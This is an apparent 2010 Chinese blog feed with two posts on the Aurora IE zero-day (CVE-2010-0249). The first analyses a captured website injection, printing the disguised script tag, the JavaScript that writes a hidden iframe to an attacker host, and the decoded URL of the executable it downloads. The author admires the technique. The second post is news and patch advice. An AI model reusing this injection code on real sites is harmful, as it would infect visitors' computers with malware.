奋斗Blog » shellcode http://www.fendou.info Wordpress|Web2.0|Network|Twitter|Search Engine Sat, 14 Aug 2010 15:27:31 +0000 http://wordpress.org/?v=2.9.1 en hourly 1 极光(CVE-2010-0249)IE 0day漏洞 Shellcode http://www.fendou.info/network/aurora-ie-0day-shellcode.html http://www.fendou.info/network/aurora-ie-0day-shellcode.html#comments Sun, 31 Jan 2010 06:11:03 +0000 dev http://www.fendou.info/?p=870 极光IE 0day漏洞出来好多天了,各种杀毒软件公司极力宣传极光(CVE-2010-0249)IE 0day漏洞多么可怕,什么一打开网页就中招,什么被入侵电脑的游戏帐号可能被盗,银行帐号多么危险。我看这就是一个噱头,无非是骗骗菜鸟在电脑上安装个只占内存不杀毒的垃圾软件,自己的网站服务器都被挂马,还能指望它杀毒?!

在网络媒体报道极光漏洞第二天网上就有极光的Shellcode流出,我从一个被挂马的网站上也抓回一个,在自己机器上测试确实像传说中的一样“不弹,不卡”,就像当年的MS06014。但我在测试过程中发现我抓到的极光的Shellcode只有在IE6下才有效,跟网上报道的有很大出入,在没打补丁的IE7下测试都不能正常执行。

这几天也在关注什么网站被挂马,好第一时间抓个回来,希望能抓到那个被利用攻击谷歌的shellcode。之前公布的极光IE 0day(CVE-2010-0249) 测试 http://www.fendou.info/x/aurora/ 就是针对IE6的。给大家分析一下这马到底是怎么挂到网站上去的。

首先是要入侵网站拿到网站的webshell

拿到网站的额webshell后,就可以直接编辑网站的页面。

在网页上插入挂马代码

我抓到的挂马代码写的特别巧妙,很值得借鉴呢,看下面代码,模仿的谷歌广告代码调用的脚本地址,而且是调用的图片,如果不仔细看是看不出来的。只要在网页上插入这么一段代码,马挂上了。

<script src=http://pagead2.googlesyndication.xx.xx/pagead/logo.gif></script>

这个图片地址空间是挂马者自己的租用的空间,域名模仿了一些知名网络服务的域名,目的就是让人不易察觉。下面看看这个logo.gif到底是什么东西。

下载回来用写字板打开这个图片文件(其实写字板能打开的文件类型很多哦)内如如下:

function Get(){
function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ 
document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
document.writeln("<iframe src=http://pagead2.googlesyndication.xx.xx/pagead/aurora.htm width=0 height=0></iframe>");
}
}Get();

挂马者考虑的还很全面居然写了cookies防止重复中马。其中iframe调用的就是极光的shellcode了。查看代码

我在这段代码中加了一行防止杀毒软件“误杀” Shellcode最终下载并运行的东西存在var u=swyice里面,十六进制转换加密的。用UE就能查看原来的内容内容%u7468%u7074 ->74 68 70 74 ->thpt ->http 看到这儿就能看出Shellcode执行的文件的地址是存在这里的,全部解开后就是:

http://pagead2.googlesyndication.xx.xx/pagead/1.exe

这个1.exe就是最终要在电脑中运行的文件。

后记:
1.极光(CVE-2010-0249)IE 0day漏洞 Shellcode 解密工具
2.IE漏洞实在太多,建议换FireFox浏览器或者其他非IE核心的浏览器。
3.杀毒软件不是万能的,别以为装个杀毒软件就什么网站都上。

相关日志

标签:, , , , ,
]]> http://www.fendou.info/network/aurora-ie-0day-shellcode.html/feed 2 极光漏洞 最新IE 0day漏洞 http://www.fendou.info/network/ms-internet-explorer-aurora-exploit.html http://www.fendou.info/network/ms-internet-explorer-aurora-exploit.html#comments Tue, 19 Jan 2010 04:35:17 +0000 dev http://www.fendou.info/?p=812 早上一起来就看到360提示又报爆IE 0day漏洞 – 极光IE 0day漏洞(CVE-2010-0249)还提供了最新漏洞补丁。所谓的0day就是指最新发现的漏洞,0day强调了这个漏洞是最新的。

网上新闻说微软要2周后才能推出极光漏洞相关的系统补丁,这次360及时发布临时漏洞补丁又抢了很大风头。对一般的网民来说系统有漏洞就得补,就好像自家的房屋有个漏洞一样,而360就充当了免费的泥瓦匠。

对那些非IE用户及时打补丁同样很有必要,比如我平时上网都用firefox的,但是操作系统的其他软件会调用IE,比如outlook,千千静听,影音风暴等等。虽然这些软件中的广告不会带有shellcode,但是如果在局域网中通过arp欺骗可以轻易在浏览的正常网页中插入,让你不知不觉就中招了。

什么是shellcode呀?shellcode就是利用漏洞能在你浏览特定网页的时候,不经过你确认直接运行shellcode构造者指定的应用程序,如果这些程序是木马,那你的电脑就成为传说中的肉鸡了。

在网上搜索相关的新闻发现这个漏洞并不是今天爆出的,国外在1月17号就发布了 MS Internet Explorer Aurora Exploit。相信不久利用的这个漏洞的网马会十分流行。大家抓紧时间打个补丁吧。

==>点此下载“极光”IE0day漏洞临时补丁

相关日志

标签:, , , , , ,
]]> http://www.fendou.info/network/ms-internet-explorer-aurora-exploit.html/feed 8